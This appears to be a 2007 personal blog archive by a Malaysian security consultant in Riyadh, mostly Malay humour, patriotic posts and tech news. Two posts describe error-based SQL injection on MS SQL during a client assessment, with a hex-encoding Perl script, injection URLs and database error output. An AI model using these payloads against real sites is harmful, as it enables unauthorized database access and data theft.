Friday, August 31, 2007

Happy 50th Independence Day Malaysia

Every 31st of August every year, it is the day when all Malaysian come together to celebrate their nation’s Independence Day - some of us call it National Day. This year Malaysia will again celebrate the birthday - 50 years Independence to be exact from Japanese and British colonize.

Malaysia has come a long way to come to where its now - a modern nation full of vibrant, colorful culture and people. From a nation that depends so much on agriculture to a developing country full of promise in many areas of the economy. Malaysia has achieved so many things over the years.

Today, I am calling out to all Malaysian bloggers - let us show some love to our nation and display our patriotism on our blogs. Let us be proud to be Malaysian and show the same pride, courage and honor like our 'Bapa Kemerdekaan' Tunku Abdul Rahman and all the previous Malaysian citizens during their time.


Perjuangan Yang Belum Selesai

Sesungguhnya tidak ada yang lebih menyayatkan
dari melihat bangsaku dijajah
Tidak ada yang lebih menyedihkan
dari membiarkan bangsaku dihina

Air mata tiada ertinya
sejarah silam tiada maknanya
sekiranya bangsa tercinta terpinggir
dipersenda dan dilupakan

Bukan kecil langkah wira bangsa
para pejuang kemerdekaan
bagi menegakkan kemuliaan
dan darjat bangsa
selangkah beerti mara
mengharung sejuta dugaan

Biarkan bertatih
asalkan langkah itu yakin dan cermat
bagi memastikan negara
merdeka dan bangsa terpelihara
air mata sengsara
mengiringi setiap langkah bapa-bapa kita

Tugas kita bukan kecil
kerana mengisi kemrdekaan
rupanya lebih sukar dari bermandi
keringat dan darah menuntutnya

Lagi pula apalah ertinya kemerdekaan
kalau bangsaku asyik mengia dan menidakkan,
mengangguk dan membenarkan,
kerana sekalipun bangganya negara
kerana makmur dan mewahnya,
bangsaku masih melata
dan meminta-minta di negaranya sendiri

Bukan kecil tugas kita
meneruskan perjuangan kemerdekaan kita
kerana rupanya selain memerdekakan,
mengisi kemerdekaan itu jauh lebih sengsara

Bangsaku bukan kecil hati dan jiwanya
bukankah sejak zaman berzaman
mereka menjadi pelaut, pengembara
malah penakluk terkemuka?
Bukankah mereka sudah mengembangkan sayap,
menjadi pedagang dan peniaga

selain menjadi ulama dan
ilmuan terbilang?
Bukankah bangsaku pernah mengharung
samudera menjajah dunia yang tak dikenal
Bukankah mereka pernah menjadi
wira serantau yang tidak mengenal
erti takut dan kematian?
Di manakah silapnya hingga bangsaku
berasa begitu kecil dan rendah diri?
Apakah angkara penjajah?
Lalu bangsaku mulai
melupakan kegemilangan silam
dan sejarah gemilang membina empayar

Tugas kita belum selesai rupanya
bagi memartabat dan
memuliakan bangsa
kerana hanya bangsa yang berjaya
akan sentiasa dihormati

Rupanya masih jauh dan berliku jalan kita
bukan sekadar memerdeka dan mengisinya
tetapi mengangkat darjat dan kemuliaan
buat selama-lamanya

Hari ini, jalan ini pasti semakin berliku
kerana masa depan belum tentu
menjanjikan syurga
bagi mereka yang lemah dan mudah kecewa

Perjuangan kita belum selesai
kerana hanya yang cekal dan tabah
dapat membina mercu tanda
bangsanya yang berjaya

Dr. Mahathir Mohamad
Mei 1996

Tuesday, August 28, 2007

SQLinjection -- convert method (continue)

My friend told me to encode some of the injection parameter from ascii to hex code. So I write a small perl script to do the job for me:

shaolinint@slash$ cat ascii2hex.pl
#! /usr/bin/perl
my $cmd = shift or die "usage: $0 string\n";
$cmd =~ s/(.)/ sprintf("char(0x%2x)%2B",ord($1)) /ge;
chomp($cmd);
print "$cmd\n";

shaolinint@slash$ perl ascii2hex.pl table1 char(0x74)%2Bchar(0x61)%2Bchar(0x62)%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31)

I had to removed the '%2B' at the end of the code above to make it work on real injections:

shaolinint@slash$ lynx -dump http://www.target.com/hello.aspx?id=(convert(varchar(255),(SELECT+top+1+table_name+FROM+
information_schema.tables+WHERE+table_name+NOT+IN(char(0x74)%2Bchar(0x61)%2Bchar(0x62)
%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31))))--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '{]table2 to a column of data type int.

The injections parameter working fine for me. But there is small problem, I still can not get the data from all tables and columns at the moment.

Monday, August 27, 2007

SQLinjection -- convert method

Last Saturday I started Portal Security Assessment for one of my client here in Saudi. And last night I completed a validation of all my findings. What make interesting during the assessment is, I found a potential SQL Injection on the portal which is a good thing for me... But the challenge is to enumerate tables and columns manually since most of tools that supposed to get the information failed to do so.... So I tried manually and play around with the injections but I still couldn't get what I want.

During my homeworks, I found a few interesting ways to print some of the informations. If you have any idea how to use following methods to enumerate tables and column, please let me know.

convert(int,convert(varchar,INJECTION_PARAMETER_HERE)) (convert(varchar(255),(INJECTION_PARAMETER_HERE)))--

For example:

http://microsoft.com/hello.asp?id=convert(int,convert(varchar,@@version))

http://microsoft.com/hello.asp?id=(convert(varchar(255),(@@version)))--

Saturday, August 25, 2007

Chinese Pirates Copy iPhone, Make Improvements

"Popular Science notes that manufacturers in China duplicate many well-know products. This includes the Apple iPhone, imitations of which are rolling off the assembly line already. That might actually be a good thing for some users, who might enjoy the user experience of China's own miniOne. 'It ran popular mobile software that the iPhone wouldn't. It worked with nearly every worldwide cellphone carrier, not just AT&T, and not only in the U.S. It promised to cost half as much as the iPhone and be available to 10 times as many consumers.' The cloned iPhone uses a Linux-based system. 'The cloners hire a team of between 20 and 40 engineers to begin decoding the circuit boards. At the same time, coders start to develop an operating system for the phone with a similar feature set. (The typical cloner either uses off-the-shelf code, writes something entirely new, or modifies a publicly available Linux-based system.)' Using the iPhone as an example, the PopSci site walks through the process of making imitation technology."

Chaos Communication Congress 2007: Call for Participation

The 24th Chaos Communication Congress (24C3) is the annual four-day conference organized by the Chaos Computer Club (CCC) in Berlin, Germany. First held in 1984, it since has established itself as “the European Hacker Conference”. Lectures and workshops on a multitude of topics attract a diverse audience of thousands of hackers, scientists, artists, and utopists from all around the world. The 24C3s slogan is Volldampf voraus! – the German equivalent of “full steam ahead” – a particular request for talks and projects featuring forward looking hands-on topics. The Chaos Computer Club has always encouraged creative and unorthodox interaction with technology and society, in the good tradition of the real meaning of “hacking”.

Topics
The 24C3 conference program is roughly divided into six general categories. These categories serve as guidelines for your submissions (and later as a means of orientation for your prospective audience). However, it is not mandatory for your talk to exactly match the descriptions below. Anything that is interesting and/or funny will be taken into consideration.

More info here and here.

Friday, August 24, 2007

What Hackers Learn that the Rest of Us Don't

Sergey Bratus contrasts developers and academic programs with what "hackers" do on his article titled "What Hackers Learn that the Rest of Us Don't" in the July/August 2007 IEEE Security and Privacy magazine. For example:

  • Developers are under pressue to follow standard solutions, or the path of least resistance to "just making it work."

  • Developers are de facto trained to ignore or avoid infrequent border cases and might not understand their effects.

  • Developers might receive explicit directions to ignore specific problems as being in other developers' domains

  • Developers often lack tools for examining the full state of the system, let alone changing it outside of the limited API.

  • If you understand this statements:

    "In a typical academic setting... an ever-increasing number of topics limits the time the students and teachers can allocate for any specific one."

    oh wait! its FTV midnight hot......... I'll make it quick. Read this posts.

    Wednesday, August 22, 2007

    WinOSX


    I really like OSX interface.. I think its cool and the best interface for desktop. Because of that, I configured my windows just look like MacOS.

    Sunday, August 19, 2007

    Lost for Mont Blanc

    Last night me and my friend went to Granada Center, one of the largest shopping mall in Riyadh. After driving to no where.. we kinda lost a bit because my friend enjoyed his story and made me lost and forgot our destination. After a few hour driving we think we missed the exit to Granada, so we kept driving until we find a u-turn. I check my watch and it's almost 9:30pm in Riyadh... Wooppss!!! I saw Granada and the 4 mini KLCC towers, its like magic! I like Saudi's.. miracle is everywhere, hehehe. We are there! Masha Allah! But anyway... it turns me crazy, I saw this sun glass.. the shape is just like Jessica Alba, Mont Blanc... pretty cool... So I asked the sales man for price... Masha Allah.. Can you imagine how much is the price for Mont Blanc sun glass?? oh man!!! oh man!!! oh man!!! Long story short, I decided to take the sun glass home with me. Once in a life time :)

    Saturday, August 18, 2007

    Voip Rakyat

    My friend (rosli) asked me to download and used voip rakyat last few days. But I only have opportunity to tests it today.

    So, he called me and started our conversations. After few minutes... I really like the results. I'm impressed! His voice is cleared, my video (webcam) movement are faster then yahoo messenger and skype. Well... at least on my computer. Another great released from Indonesian folks. Five stars rate from me. Highly recommend if you voip lover. More info here.

    My voip rakyat info:
    Name: shaolinint
    Username: 55543
    Line speed: 128 kbs
    Call Location: Riyadh, Saudi Arabia
    Call Destination: Kuala Lumpur, Malaysia

    Friday, August 17, 2007

    Doktor Pakar

    Pesakit: "Doktor, berapa lama tulang saya yang retak ini akan sembuh ?"
    Doktor: "Paling cepat enam minggu lagi "
    Pesakit: "Bila saya telah sembuh, adakah saya akan mampu dan pandai bermain muzik seperti biasa? "
    Doktor: "Oh .... tentu saja ! "
    Pesakit: "Hebat! Padahal sebelum ini saya belum pernah bermain muzik. "

    Wednesday, August 15, 2007

    Cemburu

    Aku rasa kan, tak patut lah isteri-isteri bersikap begini. Main belaaassaaahh je! Tak patut tak patut!

    Seorang isteri ingin menghubungi suaminya, tetapi telefonnya tidak berkredit lalu menyuruh anak lelakinya menyampaikan mesej penting kepada si suami yang sedang bekerja di site.

    Selepes si anak membuat panggilan, si anak memberitahu ibunya seorang perempuan lain yang menjawab pesanan telefon. Walaupun sudah berkali-kali si anak menelefon, tetap perempuan itu juga yang menjawab.

    Si isteri pun dengan marahnya menunggu kepulangan suami dari kerja di depan pintu rumah. Sesampainya suami, si isteri membelasah habis-habisan si suami kerana perlakuan curangnya.

    Habis berkumpul jiran tetangga di depan rumah untuk melihat drama petang itu. Si isteri menyuruh anaknya memberitahu semua orang apa yang dikatakan oleh perempuan di talian tadi.

    Si anak pun cakap "Harap maaf, nombor yang anda dail berada di luar kawasan liputan. Sila cuba sebentar lagi".

    Flight Engineer

    When we are in the airport, a lot of times we can see the pilots and cabin crew walking by us and begin admiring their glamorous career on board the aircraft, but do we know who is the one responsible for the maintenance aspect of the aircraft that they working on? That person is Licensed Aircraft Maintenance Engineers, he is the one responsible to make sure that an aircraft is save to fly, to carry passengers or cargo's from one point to another point and I know and met one of them, Brother Helmi. If you think you know everything about flight and glamorous career, you wrong. Take a journey to his website, you gonna like it.

    Tuesday, August 14, 2007

    Murid sekolah

    Kelas A:
    Guru:Jika ayah kamu mendapat RM80 seminggu dan memberi emak kamu separuh,berapakah yang ayah kamu dapat?

    Murid:PERANG!!

    Kelas B:
    Cikgu: Cikgu minta kamu ceritakan tentang mak masing2
    Murid A : Emak saye seorang yang penyanyang tapi kuat berleter.

    Murid B: (dgn bersungguh-sungguh) Emak saye pulak sungguh cantik tapi sampai sekarang belom berkahwin. (^-^)

    Kelas C:
    Cikgu: Baiklah murid-murid...hari ini kita akan belajar ABC
    Murid C: Saye tak suka ABC la cikgu, cincau ada tak?

    Why Islam

    I think this is a must see video. Now I know why most of Saudi women are not working. It is because of they choose not to work.

    Stesen Minyak Betranos

    Rahman bekerja di stesen minyak Betranos, Jalan King Fahad, Riyadh. Dia selalu melayani pelanggan yang ingin mengisi minyak ke dalam kereta. Pada suatu hari minyak di stesen tersebut telah habis dan perlu menunggu lagi 4 jam untuk minyak di isi semula. Rahman akan memberitahu kepada pelanggan bahawasanya minyak telah habis. Tiba-tiba datang pula pelanggan berbangsa Arab bersama kenderaan. Rahman lega sedikit, bukan apa dia ingat pak arab itu bawa unta. Tapi gelabah juga si Rahman ni akibat tidak tahu bercakap arab. Akhirnya terlintas satu ayat arab yang biasa digunakan untuk menggambarkan sesuatu itu habis. Rahman berkata kepada pak arab tersebut "Encik, minyak sudah habis, SADAQALLAHULLA'ZIMMM".

    Monday, August 13, 2007

    Peribajau 3: Semmut Keyat

    Semmut Keyat - pronounce as Semut K-Yat, bermaksud 'Semut Merah'. Aku dapat idea nak buat peribajau ni sebab aku ada kawan di Riyadh ni yang frust menonggeng tak dapat nak balik Malaysia sebab ada masalah yang belum selesai lagi. Kesian kat dia...

    Aku rasa tak payah lah aku terangkan panjang lebar, cuma peribajau ni bukanlah di antara dua orang bercinta, tapi peribajau ni sebenarnya di antara orang-orang yang rasa diri mereka besar dan berkuasa dengan orang yang takde atau "tak punya apa-apa". Faham-fahamlah kan. Korang dengarlah lagu ni dan hayati liriknya, okay?

    Sunday, August 12, 2007

    vSwitch

    VMware open development of ESX Virtual Switches to Third Party vendors, and Cisco is expected to be the first company announcing such product, perhaps Virtual Catalyst?

    You must read this and this.

    "A virtual switch, vSwitch, works much like a physical Ethernet switch. It detects which virtual machines are logically connected to each of its virtual ports and uses that information to forward traffic to the correct virtual machines. A vSwitch can be connected to physical switches using physical Ethernet adapters, also referred to as uplink adapters, to join virtual networks with physical networks. This type of connection is similar to connecting physical switches together to create a larger network. Even though a vSwitch works much like a physical switch, it does not have some of the advanced functionality of a physical switch. For more information on vSwitches"

    To me, again it will be a new security issue of course. We'll see...

    uDc team members


    MegaGath is over! I couldn't participate this time but some of uDc team members is there. It's not a security conference or similar it's just a gathering and celebration for one of our friend that going to leave the country very soon.

    I wish him all the best and hope he will find his soul mate.

    There is a good news too, CursedDaemon (picture: left), the youngest team member of uDc are now back in town. He is now continuing his study. Wish him all the best too!

    I missess all you guys special CursedDaemon, my vocabulary. I hope I'll see him when I get back to Malaysia and have a teh tarik at mama stall.

    Tuesday, August 7, 2007

    Wish You Were Here

    Pink Floyd song cover by Marty Casey. This song reminds me to my family and my home town.

    So... so you think you can tell, Heaven from Hell, blue skies from pain.. Can you tell a green field.. from a cold steel rail? A smile from a veil? Do you think you can tell? And did they get you to trade.. your heroes for ghosts? Hot ashes for trees? Hot air for a cool breeze? Cold comfort for change? And did you exchange.. a walk on part in the war, for a lead role in a cage? How I wish, how I wish you were here. We're just two lost souls swimming in a fish bowl, year after year, Running over the same old ground. What have we found? The same old fears. Wish you were here.....

    Pidgin


    I like pidgin for chatting when ever I'm running Linux.

    add debuntu repo and gpg key:

    slash@shaolinint# echo 'deb http://repository.debuntu.org/ feisty multiverse' >> /etc/sources.list
    slash@shaolinint# wget http://repository.debuntu.org/GPG-Key-chantra.txt -O- | apt-key add -


    update repo and install pidgin:

    slash@shaolinint# apt-get update
    slash@shaolinint# apt-get install pidgin

    And that's it, simply 1 2 3 :)

    Wednesday, August 1, 2007

    Hackers On A plane

    2007 is a very special year for the global hacker community. Thanks to cooperation between the organizers of DefCon XV and the Chaos Communications Camp 2007, the two largest gatherings of hackers from around the world happen only a few days apart!

    This is where "Hackers on a Plane" comes in: The Hacker Foundation has put together a complete travel package to help bring together hackers from around the world for ten days of fun, culture and community. We see it as the first step to building a truly global hacker community.

    More information here.

    Peribajau 2: Angenda' Bunga Ros Ma Langit

    Peribajau power ni beb, baru nak di masukkan dalam kamus bahasa Bajau:

    "Angenda' Bunga Ros Ma Langit" atau dalam bahasa melayu "Merenung bunga ros di langit"


    PeriBajau ni bermaksud insaflah wahai insan, banyak-banyak lah beribadah dan berbuat baik sesama manusia. PeriBajau ini juga biasanya di kuatkan lagi dengan firman dan hadis.


    Antara tanda-tanda kiamat, Allah S.W.T berfirman:

    "Selain itu sesungguhnya (ngeri) tatkala langit pecah-belah lalu menjadilah mawar merah, berkilat seperti minyak"

    Gambar ni di rakam secara tidak sengaja oleh NASA (buat-buat tak sengaja pula), terdapat objek di langit yang pecah dalam beberapa bulan yang lepas dalam akhbar Al-Ahram dan laman web NASA.

    Korang janganlah buat kerja-kerja jahat lagi, hentikanlah kerja menggodam-godam dan mengurat awek-awek tu.. tak baik, berhentilah sekarang sebelum korang di berhentikan. Dah sudahlah, aku report nanti kat mak korang, korang tak takut ke mak korang sebat dgn rotan? Sakit beb! Aku dah rasa dulu masa kecik, selalu kena sebat dengan rotan sebab selalu main lumpur. Lagi satu, mak aku selalu cubit kat paha, pergh! besh giler beb, rasa macam nak lagi, bukan apa, awek ni dah tangkap syok kat aku, tapi aku plak yang kena, hehehehe....

    PeriBajau

    Hidup di Riyadh ni bosan sikit beb. Eh silap, bukan bosan sikit tapi bosan gila tahap Din Beramboi beb. Silap-silap boleh jadi unta padang pasir kalau tak pandai sesuaikan diri. Jadi, aku nak buatlah peribahasa aku sendiri untuk mengisi masa lapang aku selapang padang pasir Saudi ni. Kalau korang tak ada masa lapang, special yang kerja kuat sampai lupa anak bini tu, korang bolehlah ambil seberapa byk masa lapang aku ni.

    Kalau tak suka tak apa, sebab peribahasa ni aku cipta ikut suka hati mak bapa Din Beramboi yang sebelah mana aku pun tak tau, tapi seingat aku sebelah tepi kanan sikit, kalau jalan terus sampai lah ke rumah Dato' K, tapi kalau korang jalan belakang aku rasa bolehlah korang jumpa unta-unta padang pasir. So, korang jangan pandai-pandai nak betulkan aku punya istilah peribahasa ni. Istilah peribahasa ni aku bagi nama "PeriBajau".

    Aku kenalah bagi nama bahasa ciptaan aku, kalau aku tak bagi nama siapa lagi! Nak tunggu korang bagi nama bukan boleh pakai dan harap langsung. Tapi, aku tau nama tu memang besh... korang tak payahlah nak puji and bodek-bodek aku. Aku dah buat survey dah, 110% yang kata best gila istilah ni, kalau tak percaya korang cuba tanya arwah sebelah rumah korang tu. Tambah lagi peribajau aku ni susah nak create dan develop beb, mau pecah kepala batu Bill Gates di buatnya.

    Okay, aku harap korang faham lah kan peribajau ni. Kalau tak faham juga, alamat nak pergi jauh lah tu. Bak kata arwah P. Ramlee, kalau ikut kira-kira, Juma'at ni lah. So, kalau tak faham, buat-buat faham je lah.

    PeriBajau aku yang pertama ialah "Mag Parking-parking Ma Padang Pasir". PeriBajau ini bermaksud parking kereta ala-ala unta rehat di padang pasir. Kepada yang tidak pernah tengok unta rehat di padang pasir tu, peribajau ni maksudnya "aku punya suka lah parking macam mana pun, aku yang drive kereta dan korang bolehlah parking jauh sikit ataupun block kereta aku". Contohnya macam dalam gambar ni:


    Aku harap korang boleh lah mula guna pakai peribajau ni.

    Lastly, aku nak ucap syukran jazila kepada bro Helmi, gambar ni bro Helmi yang tangkap. Tak tau lah dia tangkap macam mana, yang pasti dia takdelah panggil polis macam korang, nak tangkap je panggil polis, nak tangkap je panggil polis, ketinggalan betul! Sekarang ni moden beb... semunya di hujung jari je. Faham-faham jelah kan. So, yang kuku panjang dan hujung jari tak sampai papan menaip tu, cepat-cepatlah potong kuku. Kalau tidak, jangan harap lah nak guna pakai teknologi generasi kita orang ni.

    Okaylah, cukup untuk hari ni, aku ada 24 jam setiap hari bukan 25 jam. Jangan lupa komen! komen jeee.. jangan nak pandai-pandai kutuk, aku belasah karang! Dah! Pergi buat baby, banyak cekadak plak! Aku nak tido, besok nak sarapan at Al-Malas Restaurant, pekena teh tarik. Apa nak buat dah takde tempat lain, sekarang ni pun dah mula meleleh kari kat ketiak aku! hehe..